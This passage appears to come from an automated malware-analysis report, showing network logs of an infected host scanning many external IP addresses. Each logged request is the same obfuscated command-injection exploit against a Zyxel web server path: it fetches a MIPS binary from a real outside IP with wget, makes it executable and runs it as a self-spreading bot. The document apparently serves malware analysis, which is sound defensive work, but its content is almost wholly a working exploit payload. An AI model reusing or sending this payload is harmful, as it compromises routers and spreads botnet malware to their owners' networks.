                                        Jan 14, 2024 16:18:45.468103886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4415192.168.2.1334358145.119.246.230443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.468139887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4416192.168.2.1349666176.191.222.182443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.468189955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4417192.168.2.134834414.214.57.115443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.468221903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4418192.168.2.135236636.149.138.143443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.468254089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4419192.168.2.1338804216.177.251.147443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.468321085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4420192.168.2.1339362115.73.49.18443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.468353033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4421192.168.2.1345314108.40.161.129443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.468405962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4422192.168.2.1346160196.11.180.16443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.468439102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4423192.168.2.1341092185.202.248.107443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.468492031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4424192.168.2.1359706165.241.198.85443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.468513966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4425192.168.2.1337962165.180.43.128443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.468549967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4426192.168.2.1348214139.63.243.231443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.468602896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4427192.168.2.135010824.251.67.192443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.468646049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4428192.168.2.1351944137.228.63.242443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.468689919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4429192.168.2.1336076163.75.29.69443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.468720913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4430192.168.2.136067043.224.175.116443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.468787909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4431192.168.2.1345292102.163.206.21443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.468827963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4432192.168.2.133363494.202.106.97443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.468875885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4433192.168.2.1350450117.70.105.86443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.468991995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4434192.168.2.1344854181.202.192.237443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.469029903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4435192.168.2.134198013.123.208.27443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.469057083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4436192.168.2.13342482.234.29.190443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.469099045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4437192.168.2.13591561.31.120.73443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.469136000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4438192.168.2.1353052211.51.85.175443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.469175100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4439192.168.2.134357635.114.23.86443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.469228029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4440192.168.2.133352631.111.212.161443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.469269991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4441192.168.2.1338968212.103.126.141443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.469309092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4442192.168.2.134737288.206.24.161443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.469358921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4443192.168.2.1357666154.61.164.39443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.469404936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4444192.168.2.135434654.207.47.222443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.469441891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4445192.168.2.1351050117.17.110.72443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.469501019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4446192.168.2.135295294.114.232.232443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.469527006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4447192.168.2.1336324125.221.147.210443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.469533920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4448192.168.2.1357570158.107.103.191443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.469573975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4449192.168.2.1349658110.222.208.78443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.469620943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4450192.168.2.1351012103.105.190.81443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.469670057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4451192.168.2.134957038.6.23.74443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.469706059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4452192.168.2.1343750130.237.223.59443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.469754934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4453192.168.2.1334618219.115.144.204443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.469805002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4454192.168.2.1345260169.33.102.191443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.469858885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4455192.168.2.1339496140.82.77.99443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.469897985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4456192.168.2.133418235.86.33.167443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.469947100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4457192.168.2.1337226186.176.18.48443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.469986916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4458192.168.2.133910470.179.30.170443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.470010042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4459192.168.2.134902079.105.251.179443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.470055103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4460192.168.2.135870866.91.196.207443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.470108032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4461192.168.2.1343892190.117.193.58443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.470146894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4462192.168.2.135498283.212.240.61443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.470190048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4463192.168.2.1358526157.106.1.254443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.470235109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4464192.168.2.135343449.249.50.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.470272064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4465192.168.2.1336722200.46.170.157443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.470328093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4466192.168.2.1349694115.16.159.240443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.470375061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4467192.168.2.13548364.13.44.146443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.470416069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4468192.168.2.134203852.134.65.175443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.470422029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4469192.168.2.133676245.222.71.145443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.470464945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4470192.168.2.1343306207.186.19.229443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.470521927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4471192.168.2.133387040.110.140.239443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.470541954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4472192.168.2.1358978223.44.108.133443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.470609903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4473192.168.2.13462669.146.157.53443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.470643997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4474192.168.2.1355722209.90.188.98443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.470685959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4475192.168.2.1345088107.91.132.0443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.470730066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4476192.168.2.13597629.131.205.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.470762014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4477192.168.2.134476618.105.83.233443
                                        TimestampBytes transferredDirectionData
